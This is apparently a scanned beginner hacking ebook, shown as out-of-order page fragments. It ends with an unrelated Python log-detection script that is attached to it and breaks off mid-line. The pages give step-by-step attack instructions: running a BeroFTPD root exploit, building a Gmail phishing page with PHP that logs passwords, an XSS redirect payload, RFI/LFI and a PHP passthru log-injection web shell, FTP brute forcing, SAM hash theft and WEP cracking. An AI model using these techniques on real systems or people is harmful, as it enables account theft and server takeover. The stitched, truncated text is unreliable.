a.out Documents Music Public Videos Desktop exploit.c Pictures Templates
ubuntu@ubuntu:~$ ./a.out
BeroFTPD 1.3.4(1) exploit by gitestl
Usage: ./a.out [options]
Options:
  -h hostname
  -t target
  -o offset
Available targets:
  0 RedHat 6.2 with BeroFTPD 1.3.4(1) from tar.gz
  1 Slackware 7.0 with BeroFTPD 1.3.4(1) from tar.gz
  2 Mandrake 7.1 with BeroFTPD 1.3.4(1) from rpm
ubuntu@ubuntu:~$ ./a.out -h [host name here] -t [target site here] -o [offset here]

12. The last line of the picture shows the proper way a hacker would use the script against a server.
13. Once the hacker ran the script against a vulnerable server running BeroFTPD 1.3.4 and the script worked, the hacker would now have root access to the server. Below is an image of what the root account on Ubuntu would look like.

[Screenshot: terminal]
root@ubuntu:~# whoami
root
root@ubuntu:~#

As you can see, the whoami command tells you who you are on the system. In this case, I am root.

Cygwin

If you only have access to a Windows machine and you come across a C/C++ script that is only meant to be compiled in Linux, then you can use Cygwin to make it possible in Windows. Let's get right into it.

1. Download Cygwin from http://www.cygwin.com
2. Run the installer.
3. Choose to install from the internet.

[Screenshot: Cygwin Setup, "Choose Installation Type" / "Choose A Download Source": Choose whether to in
57. get it ready for appending data, which in this case is your username and password.

foreach($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}

This section simply assigns all the information going through this form to a variable. This includes your username and password.

fwrite($handle, "\r\n");

This writes your details to the file list.txt.

fclose($handle);

This simply closes the connection to the file list.txt.

exit;
?>

Marks the end of the PHP program.

So far you should see the following in your folder:

[Screenshot: folder listing with three files: phish (PHP File, 2 KB), list (Text Document, 0 KB), index (Firefox Document, 16 KB) and a folder ServiceLogin_files]

5. Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page, named index.htm, with Notepad.
6. Hit <CTRL>+F, or go to Edit > Find, type in "action" and hit Find Next.

[Screenshot: Notepad Find dialog with "action" in the "Find what" box, Direction Up/Down, Match case; behind it the page source around <form id="gaia_loginform" action="https://www.google...]

7. This will highlight the first occurrence of the word "action" in the script, and you should see the following:

<form id="gaia_loginform" action="https://www.google.com/accounts/Service
58. hcrack LiveCD (No installation).

Once you have it downloaded, install it. When the option comes up to download rainbow tables, unclick them all and just install the program. It is better to download the rainbow tables separately.

[Screenshot: ophcrack 3.0.1 Setup, "Choose Components": "Choose which features of ophcrack 3.0.1 you want to install. Check the components you want to install and uncheck the components you don't want to install. Click Next to continue." Components: ophcrack (required), Download and install small WinXP tables (380MB), Download and install fast WinXP tables (703MB), Download and install free Vista tables (461MB). Space required: 12.6MB]

3. Once it is installed, go to the ophcrack website and click on "Tables" in the navigation. This will display all the tables you can download. As you can see, the more characters covered, the bigger the table gets. Choose the correct table for your operating system.

[Screenshot: ophcrack tables page: "XP free small (380MB), formerly known as SSTIC04-10k, success rate 99.9%"; "XP free fast (703MB), formerly known as SSTIC04-5k, success rate 99.9%"; "XP special (7.5GB), formerly known as 20k"; the charset and md5sum columns are illegible in the scan]
59. he following JavaScript code:

<script>window.location="http://phishing-site.com"</script>

Now when you go to the finished link, the legitimate site will redirect to the phishing website. Next, what the hacker would do is encode the URL to make it look more legit and less suspicious. You can encode the URL at http://www.encodeurl.com. My finished encoded URL is:

http%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox%3D%3Cscript%3Ewindow.location%3D%5C%22http%3A%2F%2Fphishing-site.com%5C%22%3C%2Fscript%3E%26search%3Dsearch%21

Once the victim sees that the link points to the legitimate website, he will be more likely to fall for the phishing attack.

Remote File Inclusion

Remote File Inclusion (RFI) occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included into a website, which allows the hacker to execute server-side commands as the current logged-on user and have access to files on the server. With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system.

Many servers are vulnerable to this kind of attack because of PHP's default settings of register_globals and allow_url_fopen being enabled. Although as of PHP 6.0 register_globals has been deprecated and removed, many websites still rely on older versions of PHP to run their web applications. Now let's go through
60. ine, or causing it to deny requests from legitimate users trying to access it.

Buffer Overflow (BoF)

A buffer overflow happens when a program attempts to store more data into a buffer, or a data storage area, than it was meant to hold. Because the buffer was only meant to hold a certain amount of data, the extra information overflows into other buffers, causing them to be overwritten with malicious code created by the hacker. Once this code is executed, the hacker can receive full control of the server.

If you search the milw0rm exploit database, you will see that in many exploit titles it reads "local exploit" or "remote exploit". Below are their definitions.

Local Exploit

To run a local exploit you must first have access and privileges on the machine. Local exploits are usually used to escalate one's privileges to admin or root. In other words, it allows an ordinary user to gain root privileges.

Remote Exploit

A remote exploit is pretty much the same thing as a local exploit, except that it isn't run locally but launched from anywhere across the internet. A hacker usually has to use a combination of both remote and local exploits to gain full control of a system. For example, the hacker may have been able to gain regular privileges with a remote exploit attack and then be able to escalate to root privileges with the help of a local exploit.

Penetrating

So now you might be wondering: once the hacker finds the right exploit, how
61. ing down the end results and shortening the cracking process.

[Screenshot: Brutus "Brute Force Generation" dialog with character set options: Digits only, Lowercase Alpha, Uppercase Alpha, Mixed Alpha, Alphanumeric, Full Keyspace, Custom Range; Min Length and Max Length fields]

I chose lowercase alpha, which has the second smallest amount of combinations. Even at second smallest, it came up with 321,272,407 possible password combinations. Now you know why it can take so long to crack one password.

[Screenshot: Brutus log: "authentication plug-in located and installed. Initializing... Target 127.0.0.1 verified. Brute force will generate 321272407 passwords. Maximum number of authentication attempts will be 321272407. Engaging target 127.0.0.1 with FTP"]

Rainbow Tables

A rainbow table is a huge pre-computed list of hash values for every possible combination of characters. A password hash is a password that has gone through a mathematical algorithm that transformed it into something absolutely foreign. A hash is a one-way encryption, so once a password is hashed there is no way to get the original string from the hashed string. A very common hashing algorithm used as security to store passwords in website databases is MD5.

Let's say you are registering for a website. You put in a username and password. Now, when you submit, your password goes through the MD5 algorithm and the outcome hash is stored in a database. Now, since you can't get the passwo
62. ing to http://www.yourwebhosturl.com/youraccount/list.txt. Although this is the most common, the web host you use may provide a different-looking URL. Now, if I put in a username of "myusername" and a password of "mypassword", then list.txt would now look like the following:

[Screenshot of list.txt: the submitted Gmail form fields, one per line, including continue=http://mail.google.com/mail/, service=mail, Email=myusername, Passwd=mypassword, rmShown=1 and signIn=Sign in]

As you can see, if you fell for this, the hacker would have your email and password. Scary, eh?

Countermeasures

I will now show you all the countermeasures you should take to protect yourself from all of the password cracking attacks talked about in this chapter.

Social Engineering

To protect yourself from social engineering attacks like the one discussed in this chapter, you must learn to question the possible attacker. If you get a phone call from someone and you think that there may be a chance that the person isn't who he says he is, then ask him some questions that he should be able to answer to establish his legitimacy. Some professional social engineers study the company before attacking, so they might know all the answers. That's why, if you still have some doubts, you should ask the head of whatever department the attacker is from to find out if he is legit. Better safe than sorry.

Shoulder Surfing

When you type in your password, make sure there is no one behind you a
63. is a Windows-only password cracker, and it uses rainbow tables to get the job done quickly. It cracks passwords for both Windows XP and Vista, but it is more powerful on XP because Vista fixed the security hole that allowed XP passwords to be cracked easily. Windows uses a couple of types of hashes. One of them is the LM (Lan Manager) hash. If a password is longer than seven characters, then it is split into seven-character chunks, made all uppercase and then hashed with the DES encryption. Because it is split into parts and made all uppercase, the total number of different password combinations goes down significantly and makes it easier for hackers to crack the password.

The Windows password hashes are stored in a couple of places:
• In the C:\WINDOWS\system32\config directory, where it is locked to all accounts but the system account, which you don't have access to.
• In the registry, HKEY_LOCAL_MACHINE\SAM, where it is also locked for all users.

So you might be wondering, how can I get a copy of those hashes? There are a couple of ways:
• Boot from a Linux live CD and copy the SAM file onto a USB or floppy disk.
• Use the PWDUMP program that comes with ophcrack to trick the registry into giving up the hashes.

First, download and install ophcrack. As you can see, there are two versions. In this example we will be using the program itself in Windows, so download the first option.

[Screenshot: ophcrack download page with two options: "Download ophcrack - All platforms" and "Download op
64. knowledge of what's happening behind the scenes.

Intermediate hackers: These people usually know about computers and networks, and have enough programming knowledge to understand relatively what a script might do, but, like the script kiddies, they use pre-developed, well-known exploits (a piece of code that takes advantage of a bug or vulnerability in a piece of software that allows you to take control of a computer system) to carry out attacks.

Elite Hackers: These are the skilled hackers. They are the ones that write the many hacker tools and exploits out there. They can break into systems and hide their tracks, or make it look like someone else did it. You should strive to eventually reach this level.

What does it take to become a hacker?

Becoming a great hacker isn't easy and it doesn't happen quickly. Being creative helps a lot. There is more than one way a problem can be solved, and as a hacker you encounter many problems. The more creative you are, the bigger chance you have of hacking a system without being detected. Another huge quality you must have is the will to learn, because without it you will get nowhere. Remember, knowledge is power. Patience is also a must, because many topics can be difficult to grasp and only over time will you master them.

Chapter Two: Programming

Do I Really Need It?

You might be asking yourself, do I even need to learn a programming language? The answer to that is both yes and no. It
65. LoginAuth?service=mail"

There are two "action" occurrences in the script, so make sure you have the right one by looking at the form id name above. Change the link between action="" to phish.php. This will make the form submit to your PHP phish script instead of to Google. After the link you will see the code method="POST". Change the word POST to GET so that it looks like method="GET". What the GET method does is submit the information you type in through the URL, so that the PHP script can log it.

8. Save and close the file.
9. Next, the hacker would upload the files to a free web host that supports PHP. With a simple Google search you can come up with a bunch that fall under this category.
10. Once all the files are uploaded, you must give write permissions to the list.txt file. Every hosting company should have a CHMOD option next to each file. Select this option and change the file permission for list.txt to 777. If you can't figure out how to do this, ask people that use the same host, or simply Google something similar to "yourwebhostname chmod".
11. Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.
12. Now go take a look at your list.txt file by going through your hosting file manager, or go
66. n 2

[Screenshot: nbtstat output. Node IpAddress: [192.168.1.161] Scope Id: []. NetBIOS Remote Machine Name Table: DAVIDS-MACHINE <00> UNIQUE Registered; DAVIDS-MACHINE <20> UNIQUE Registered; MSHOME <00> GROUP Registered; MSHOME <1E> GROUP Registered; MSHOME <1D> UNIQUE Registered; ..__MSBROWSE__. <01> GROUP Registered; MAC Address (illegible in scan)]

9. In the above image, DAVIDS-MACHINE is the name of the target computer. If you look to the right of it you will see the number <20>. This means that file and printer sharing is enabled. If there was no <20>, then you could not go any further and would have to find a new target.
10. Next, the hacker would run the command "net view \\TargetIPaddress". This command will display any shared drives, folders, files or printers. If nothing comes up, you won't be able to gain access to anything since there is nothing being shared. In my case I got the following:

[Screenshot: command prompt]
C:\Documents and Settings\David M>net view \\192.168.1.161
Shared resources at 192.168.1.161
Share name   Type   Used as   Comment
Send To OneNote 2007
HP Photosmart 8266 Series
The command completed successfully.

11. In my example I have two printers shared and one disk named SharedDocs. The hacker would be able to take control of my printers and view everything in my SharedDocs disk.
12. To gain access to my SharedDocs disk, the hacker would have to map the drive onto his computer. If su
67. n you can use Cygwin. Cygwin is a Linux-like environment that runs in Windows and acts as a Linux emulation layer, allowing you to run Linux scripts in Windows. Although many Linux C/C++ exploit scripts will work with Cygwin, there are also many that may not. I will show you how you can use Cygwin right after I give you an example of compiling and running a C/C++ script in Ubuntu Linux. If you aren't already using Linux, I would recommend following along using VirtualBox from the Linux chapter.

1. Open up Terminal.

[Screenshot: Ubuntu Applications menu, Accessories submenu (Calculator, Character Map, Dictionary, Disk Usage Analyzer, Manage Print Jobs, Passwords and Encryption Keys, Take Screenshot, Terminal, Text Editor) with Terminal highlighted]

2. Go to http://milw0rm.com/exploits/269 and copy the remote root exploit.
3. Open up the VI editor in the terminal by typing in vi and hitting <Enter>. You should see the following screen:

[Screenshot: Ubuntu terminal showing the Vim splash screen]
VIM - Vi IMproved
version 7.1.138
by Bram Moolenaar et al.
Vim is open source and freely distributable
Become a registered Vim user!
type :help register<Enter> for information
type :q<Enter> to exit
type :help<Enter> or <F1>
68. nd move it into the C:\cygwin directory as exploit.c.

10. Now it's time to run the exploit. First you must change the directory to the home directory (C:\cygwin) by using the command cd /. Next, use the ls command to display all the files in the current directory. You should see exploit.c.
11. Now, to compile the script, we use the same command as we did in Ubuntu: gcc exploit.c -o exploit. Here you see that we added a new parameter, -o. This simply tells the compiler to name the output .exe exploit.exe. Hit <ENTER>, and if no error messages came up then it was successful. If you use the ls command again, you should see a new file, exploit.exe, in the directory.
12. To run the exploit, simply type ./exploit. It will now display the script's runtime directions. Put in the right options and parameters and run the script again. The picture below shows all of these steps being done.

[Screenshot: Cygwin terminal. First ls: Thumbs.db, cygdrive, etc, home, proc, usr, cygwin.ico, bin, dev, exploit.c, lib, tmp, var. Second ls after compiling additionally shows exploit.exe. Running ./exploit prints: "BeroFTPD 1.3.4(1) exploit by gitestl. Usage: ./exploit [options]. Options: -h hostname, -t target, -o offset. Available targets: 0 RedHat 6.2 with BeroFTPD 1.3.4(1) from tar.gz; 1 Slackware 7.0 with BeroFTPD 1.3.4(1) from tar.gz; 2 Mandrake 7.1 with BeroFTPD 1.3.4(1) from rpm". Last line: ./exploit -h [host her
69. ndy if the hacker was planning to attempt a social engineering attack against the company.

2. Next, the hacker would get the IP address of the website. By going to http://www.selfseo.com/find_ip_address_of_a_website.php and inserting the website URL, it will spit out its IP address. The IP address of google.com is 64.233.187.99.

[Screenshot: selfseo.com result: "The IP address 64.233.187.99 is assigned to United States"; form with "Enter URL: google.com" and a "Get IP" button]

3. Next, the hacker would ping the server to see if it is up and running. There's no point in trying to hack an offline server. http://just-ping.com pings a website from 34 different locations in the world. Insert the website name or IP address and hit "Ping". If all packets went through, then the server is up.

[Screenshot: just-ping.com results for "ping google.com" (input hint: "e.g. Yahoo.com or 66.94.234.13"). Checkpoints including Santa Clara U.S.A., Vancouver Canada, New York U.S.A., Florida U.S.A., Austin U.S.A., San Francisco U.S.A., Amsterdam Netherlands, London United Kingdom, Chicago U.S.A., Cologne Germany, Munchen Germany, Paris France, Madrid Spain and Stockholm Sweden all report "Okay" with their min/avg/max round-trip times (figures illegible in scan)]
70. nowledgeable in the area of HTML and the PHP programming language. Below I will show a simple example of some of the steps a hacker might take to create a phishing website. Seeing the steps a hacker would take will help you defend against such an attack.

1. First, the hacker chooses a target. The most popular targets for phishing attacks are e-mail services such as Hotmail and Gmail, because they are the most common, and once a hacker gets access to your e-mail he also gets access to a load of other user information for all the other websites you use. In this example we will pretend the hacker chose Gmail as his target.
2. After choosing his target, the hacker will go to the website and save the whole main page. I use Mozilla Firefox (I highly recommend using this browser for its security and customization). So I would go to www.gmail.com and click File > Save Page As, or simply hit <CTRL>+S, which does this automatically. Choose where you would like to save the web page and hit Save.

[Screenshot: "Gmail: Email from Google - Mozilla Firefox" with the File menu open: New Window (Ctrl+N), New Tab (Ctrl+T), Open Location (Ctrl+L), Open File (Ctrl+O), Close (Ctrl+W), Save Page As (Ctrl+S), Send Link, Page Setup, Print Preview, Print (Ctrl+P), Import, Work Offline, Exit; behind it the "Welcome to Gmail" page]
71. of the bad data out and good data in.
3. Install anti-virus software.
4. Scan your system with a vulnerability scanner. This may reveal possible vulnerabilities in your system.

Chapter Six: Wireless Hacking

Nowadays there are wireless hotspots everywhere. You can get internet access with a wireless-enabled laptop almost everywhere you go. In this chapter I will discuss ways a hacker goes about getting into secure wireless networks and things he can do once he is inside.

Scanning for Wireless Networks

For this section and the following, you will need to have a wireless card/adapter. The hacker starts by scanning for wireless networks near him. The Windows tool we will use in this section is called NetStumbler. Also, by the time you receive this eBook, MacStumbler may already be released for those of you using a Mac. Some other similar programs are:
• Kismet for Windows and Linux
• KisMac for the Mac

1. Download and install NetStumbler.
2. Run it. It automatically starts to scan for wireless access points.
3. Once it is completed, you should see a list of all the wireless access points around you.

[Screenshot: Network Stumbler window listing nearby access points by MAC, SSID, channel, speed and vendor; among them "default" (22 Mbps, D-Link), "network" (11 Mbps, Acer), "Lynda's Network" (11 Mbps, Apple) and "LANA" (11 Mbps, Linksys); MAC addresses illegible in scan]
72. out the remote server and list all the files and directories on it. From here the hacker would find a directory that has read and write privileges and upload the shell, but this time as a .php file, so that in case the vulnerability is fixed he will be able to access it later on.
9. The hacker would next find a way to gain root privileges on the system. He can do this by uploading and running local exploits against the server. He could also search the victim server for configuration files. These files may contain usernames and passwords for the MySQL databases and such.

To protect yourself from RFI attacks, simply make sure you are using up-to-date scripts, and make sure your server's php.ini file has register_globals and allow_url_fopen disabled.

Local File Inclusion

Local File Inclusion (LFI) is when you have the ability to browse through the server by means of directory traversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file contains the user information of a Linux system. Hackers find sites vulnerable to LFI the same way I discussed for RFI.

Let's say a hacker found a vulnerable site, www.target-site.com/index.php?p=about. By means of directory traversal he would try to browse to the /etc/passwd file: www.target-site.com/index.php?p=[traversal sequence lost in scan]etc/passwd. The [illegible] takes you up one directory, and the amount to use depends on where in the server you are located compared to the location of the
73. rd from the hash, you may be wondering how they know if your password is right when you log in. Well, when you log in and submit your username and password, a script takes your password and runs it through the MD5 algorithm. The outcome hash is compared to the hash stored in the database. If they are the same, you are admitted.

If I were to run the word "cheese" through the MD5 algorithm, the outcome would be fea0f1f6fede90bd0a925b4194deac11.

Having huge tables of every possible character combination hashed is a much better alternative to brute-force cracking. Once the rainbow tables are created, cracking the password is a hundred times faster than brute forcing it. I will show an example of rainbow table cracking when we get into Windows password cracking.

Phishing

Phishing is the process of stealing sensitive information, such as usernames, passwords and bank information, by pretending to be someone you're not. An example of this would be if you receive an e-mail from a hacker pretending to be your bank. In this e-mail it might tell you that you need to update your account before it expires, and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like your actual bank page. In reality it's just a perfect replica, and when you input your login details it sends them to the hacker's email or stores them on his web server. Hackers that create the best, most deceiving phishing web pages are k
74. red is for the target machine to have file and printer sharing enabled and to have port 139 open. Below I will show you an example of what a hacker would do to gain access to a Windows machine through NetBIOS.
1. First the hacker would search for a target. A common tool used by hackers is Angry IP Scanner. Download and install it.
2. Next the hacker would insert the IP range he would like to scan. If the hacker was connected to a WLAN (Wireless Local Area Network) he would scan the local computers, like I have shown below. [Screenshot: Angry IP Scanner with the IP range 192.168.1.0 to 192.168.1.224 entered and the local hostname listed]
3. Since the hacker's goal is to gain access to a system through NetBIOS, which runs on port 139, he will choose to scan each found host for that port. Click the downward arrow on the right and check the "Scan ports" box. A popup will come up asking you if you would like to select a new port. Click YES. [Screenshot: prompt reading "No ports are currently selected for scanning. Do you want to select them?"]
4. Type the port number 139 into the first box and click OK. [Screenshot: the "Select ports" dialog, with a single port or a port range to add]
Note: please be patient when scanning
75. remely long. Creating tables for passwords that are long takes a very long time and a lot of resources. That is why there aren't many of these tables available.
Phishing
Phishing attacks are very simple to avoid. When you are asked to put your personal information into a website, look up into the URL bar. If, for example, you are supposed to be on Gmail.com and in the URL bar it says something completely different, like gmail.randomsite.com or gamilmail.com, then you know this is a fake. When you are on the real Gmail website the URL should begin with www.google.com; anything else is a fake.
More Programs
Now that you know what password cracking is, you might be interested in learning some more of the popular cracking software I have listed below:
• Cain and Abel
• John the Ripper
• THC Hydra
• SolarWinds
• RainbowCrack
Chapter Five: Network Hacking
Footprinting
Footprinting is the act of gathering information about a computer system and the companies it belongs to. Footprinting is the first step hackers take in their hacking process. Footprinting is important because to hack a system the hacker must first know everything there is to know about it. Below I will give you examples of the steps and services a hacker would use to get information from a website.
1. First a hacker would start gathering information on the target's website. Things a hacker would look for are e-mails and names. This information could come in ha
76. ropriate option, which in this case is FTP.
5. The default port is 21, but some websites change this to make them a little more secure. If you find out that the port isn't 21, you can find the right one by doing a port scan. We will get into this later in the book.
6. If you don't know any of the usernames for the FTP server, then you will have to get a list of the most common usernames.
7. For a dictionary attack you will have to choose the pass mode "Word List" and browse and select the file containing your word list. You can get some good password lists at packetstormsecurity.org/Crackers/wordlists. Below are examples of what a username and password list might look like. [Screenshot: users.txt open in Notepad containing "admin" and "administrator"; words.txt open in Notepad containing a dictionary list that begins ada, abc, academia, academic, access, admin, administrator, adrian, adrianna, aerobics, airplane, albany, albatross, albert, alex, alexander, alf, algebra, alias, aliases, alice, alicia, alisa, alison]
8. Once you hit Start, the program will attempt to connect to the server and begin to try all the possible combinations from your lists. [Screenshot of the program's output: "Target 127.0.0.1 verified. Loaded user file containing 6 users. Loaded password file containing 815 passwords. Maximum number of authentication attempts will be 4890. Engaging target 127.0.0.1 with FTP"]
9. If you're lucky, eventually it'll get the right Username/Password combination. As you
77. rver that contains the PHP executable file. In WAMP the directory would be C:\wamp\bin\php\php5.2.5 (of course the last directory's version number changes with newer versions). Next open up the command prompt (or terminal if you are using a Mac) and go to the PHP directory by using the CD (change directory) command followed by the directory location. [Screenshot: a Windows XP command prompt in which "cd C:\wamp\bin\php\php5.2.5" is typed]
3. Now it's time to run the exploit. To run it, simply type in "php exploit.php" and hit enter. You should get a couple of errors: [Screenshot: "Notice: Undefined variable: junk in C:\wamp\bin\php\php5.2.5\exploit.php on line 18" and "Fatal error: Call to undefined function socket_create() in C:\wamp\bin\php\php5.2.5\exploit.php on line 28"]
4. When skilled hackers create exploits, they sometimes insert mistakes or extra code so that script kiddies with no programming knowledge wouldn't be able to use them. The above is a simple example. If you go to line 18 of this exploit you will see the line $junk .= "sun tzu" . "sun tzu" . "sun tzu"; This line was inserted to throw off the script kiddies, and by simply removing it the error will disappear. Just another reason why it's helpful to l
78. s. Everything you do will be stored temporarily in your RAM. Below are the steps to create a Live CD.
1. Download the Ubuntu Live CD .iso file from www.ubuntu.com. [Screenshot: the ubuntu.com home page as of 25th September 2008, with the "Download Ubuntu", "Get Ubuntu" and "Get Support" links; Ubuntu 8.04 LTS is the current release and Ubuntu 8.10 is marked "Coming Soon"]
79. s [Screenshot: the Ubuntu boot screen showing the kernel command line ending in "casper initrd=/casper/initrd.gz quiet splash" and the F1 to F6 function keys]
Learning Linux
Now that you have Ubuntu up and running, you might be wondering what to do next. You should now start to learn and eventually master the Linux distribution of your choice. You'll find that almost every distribution has a massive community that is ready to help you, and it's only a Google search away. For example, if you choose to stick with Ubuntu, http://ubuntuforums.org has a community of 700,000 members. So if you have a question or problems, ask away; there will always be someone out there with a solution. I would also recommend buying a book. Reading is the best way to gain knowledge. Below I have a list of some great books you should take a look at:
• A Practical Guide to Linux Commands, Editors, and Shell Programming
• Understanding the Linux Kernel, Third Edition
• A Practical Guide to Ubuntu Linux
• How Linux Works
There are many websites on the internet dedicated to teaching the community about Linux. Below I have a list of a few good ones:
• Official Linux Website
• Begin Linux
• Linux Tutorials
For those of you that are visual learners, below are two great video courses:
• Introduction to Linux
• Ubuntu Linux Tutorials
The resources listed above are more than enough for you to master the ins and outs of Linux. So choose a book, website or video and begin to take in some mor
80. s adapter.
2. Download Backtrack and create a Live CD. The tools we will be using on Backtrack are: Kismet (a wireless network detector), airodump (captures packets from a wireless router), aireplay (forges ARP requests) and aircrack (decrypts the WEP keys). Let's begin.
1. First we will find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in "kismet". It may ask you for the appropriate adapter, which in my case is ath0. You can see your device's name by typing in the command "iwconfig". [Output of iwconfig: the other interfaces report "no wireless extensions"; the wireless interface reports IEEE 802.11g, ESSID "default", Mode: Managed, Frequency 2.462 GHz, Access Point 00:14:A5:35:7A:64, Bit Rate 54 Mb/s, Tx-Power 18 dBm, Sensitivity 0/3, Retry off, RTS thr off, Fragment thr off, Power Management off, Link Quality 50/94, Signal level -45 dBm, Noise level -95 dBm, Rx invalid nwid 19994, Rx invalid crypt 0, Rx invalid frag 0, Tx excessive retries 1552, Invalid misc 1552]
2. To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this, and as long as you keep it open your wireless adapter will stay in monitor mode. In kismet you will see the flags Y, N and O. Each one stands for a different type of encryption. In our case we will be looking for access points with WEP encryption. Y = WEP, N = OPEN, O = OTHER (usually WAP).
81. s [Screenshot continued: the rest of the ubuntu.com home page (the Ubuntu promise and news items from August 2008) and the "Get Ubuntu" page, which offers three ways to get Ubuntu: download the Ubuntu, Edubuntu or Kubuntu CD installer to your computer, request free CDs, or buy it on CD/DVD. Please note the CD installer is nearly 700 MB; if you don't have a fast internet connection you may want to
82. s connection has limited or no connectivity.
Chapter Eight: Malware
Malware is a big problem today. Every day thousands of innocent people are getting infected by different types of malware. The most common types of malware today are viruses, worms and Trojans. In this chapter we will discuss all the types of malware and give you an example of a Windows trojan in use. The reason we will use Windows is because malware is very rare on Linux and Mac computers.
Definitions
1. Viruses: Viruses cannot spread without the help of us humans. They are like parasites because they need a host to attach themselves to. The host is usually a legitimate-looking program or file. Once this program is launched, the virus is executed and infects other files on your computer. Viruses can be very destructive. They can do damage to your computer hardware, software and files. Viruses are spread through the sharing of files and are many times sent within emails via attachments.
2. Worms: A worm is a malicious program that can replicate itself onto other computers on a network. Unlike a virus, worms don't need a human to be able to spread and infect systems. Once it infects a system, it uses that system to send out other copies of itself to other random systems, attempting to infect them.
3. Trojan Horse: A trojan horse is a malicious program that can be used to do silly things to a system, like changing its desktop, messing with the user interface, and tak
83. s [Screenshot: a BIOS setup screen (picture property of www.cyberwalker.com) showing System Time, System Date, Drive Configuration, Boot Sequence, Memory Information, CPU Information, Integrated Devices (LegacySelect Options), Power Management and System Security; in the Boot Sequence screen the IDE CD-ROM drive is moved to first place, as in this example]
If all went well you should see the Ubuntu boot options screen. [Screenshot: the Ubuntu boot menu with "Try Ubuntu without any change to your computer" selected, the boot options line ending in "casper initrd=/casper/initrd.gz quiet splash", and the F1 to F6 keys]
You will first see a window full of countries. Once you select yours, you will see the main Ubuntu screen. From here choose the first option to try Ubuntu without any risks. Once the Ubuntu desktop has loaded and you decide you like what you see, you have the option to install it by clicking on the install button on the desktop.
Wubi
Wubi is my favorite option. With the Wubi installer you can install and uninstall Ubuntu as any other Windows application. Yo
84. s_log, /var/log/apache2/access_log, /var/log/apache/access.log, /var/log/apache2/access.log, /var/log/access_log, /var/log/access.log, /var/www/logs/error_log, /var/www/logs/error.log, /usr/local/apache/logs/error_log, /usr/local/apache/logs/error.log, /var/log/apache/error_log, /var/log/apache2/error_log, /var/log/apache2/error.log, /var/log/error_log, /var/log/error.log
Below are the steps a hacker would take to gain access to the system through log injection.
1. First the hacker would find what operating system version the target server is running and then search where the log files are located on that OS.
2. Next, through LFI, the hacker would navigate to that file location. If he is displayed with a bunch of logs, then he may continue.
3. The hacker would then inject some PHP code into the logs by typing <? passthru($_GET[cmd]) ?> after the = in the URL. This will cause the PHP script to be logged because there is no file by that name. What this script will do is give the hacker shell access and allow him to execute system commands.
4. Now if the hacker goes back to the log file, he will see that his PHP script wasn't parsed and instead converted to
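Detection logic for the two LFI abuses this chapter describes, the directory traversal towards /etc/passwd from the Local File Inclusion section and the log-injection step above, run over constructed Apache access-log lines. This is an added example, not code from the book; the log lines, IP addresses, timestamps and field names are made up for the demo.

```python
"""Flag access-log lines that show directory traversal or PHP code being
smuggled into a logged field (the log-poisoning step that an LFI then includes)."""
import re
from urllib.parse import unquote

# Constructed Apache "combined" log lines for the demo; not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2008:13:55:36 +0000] "GET /index.php?p=about HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2008:13:55:40 +0000] "GET /index.php?p=../../../../etc/passwd HTTP/1.1" 200 1847 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2008:13:55:44 +0000] "GET /index.php?p=..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Faccess.log HTTP/1.1" 200 9023 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2008:13:55:50 +0000] "GET /<? passthru($_GET[cmd]) ?> HTTP/1.1" 404 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2008:13:56:01 +0000] "GET /news/show.php?id=12 HTTP/1.1" 200 4410 "-" "<? passthru($_GET[cmd]) ?>"
198.51.100.7 - - [10/Oct/2008:13:56:05 +0000] "GET /index.php?p=contact HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Files the chapter names as LFI targets: /etc/passwd and the web server logs.
SENSITIVE_PATHS = ("/etc/passwd", "/var/log/", "/usr/local/apache/logs/", "/var/www/logs/")
# Coarse markers of PHP code in a logged field ("<?" will also hit legitimate XML; tune per site).
PHP_MARKERS = ("<?", "passthru(", "$_get[")


def parse_line(line):
    """Split one combined-format line into its fields; None if it does not match."""
    m = LINE_RE.match(line.rstrip("\n"))
    if not m:
        return None
    entry = m.groupdict()
    parts = entry["request"].split(" ")
    # The request line is "METHOD PATH PROTO"; a poisoned path may itself contain
    # spaces, so take the first and last tokens and treat the rest as the path.
    entry["method"] = parts[0] if parts else ""
    entry["path"] = " ".join(parts[1:-1]) if len(parts) >= 3 else entry["request"]
    return entry


def decode(value):
    """Undo up to two layers of URL encoding so ..%2F and %252e%252e are seen as ../."""
    return unquote(unquote(value))


def classify(entry):
    """Return the reasons this request looks like LFI abuse (empty list if benign)."""
    reasons = []
    path = decode(entry["path"]).lower()
    if "../" in path or "..\\" in path:
        reasons.append("traversal")
    if any(target in path for target in SENSITIVE_PATHS):
        reasons.append("sensitive-file")
    # Poisoning can arrive through any field the server writes to its log.
    for field in ("path", "referer", "ua"):
        text = decode(entry[field]).lower()
        if any(marker in text for marker in PHP_MARKERS):
            reasons.append("log-poisoning:" + field)
    return reasons


def scan_log(text):
    """Scan a whole log; return one finding per suspicious line, in file order."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        entry = parse_line(line)
        if entry is None:
            continue  # unparsable line: skip here, count it in production
        reasons = classify(entry)
        if reasons:
            findings.append({"line": number, "ip": entry["ip"],
                             "request": entry["request"], "reasons": reasons})
    return findings


if __name__ == "__main__":
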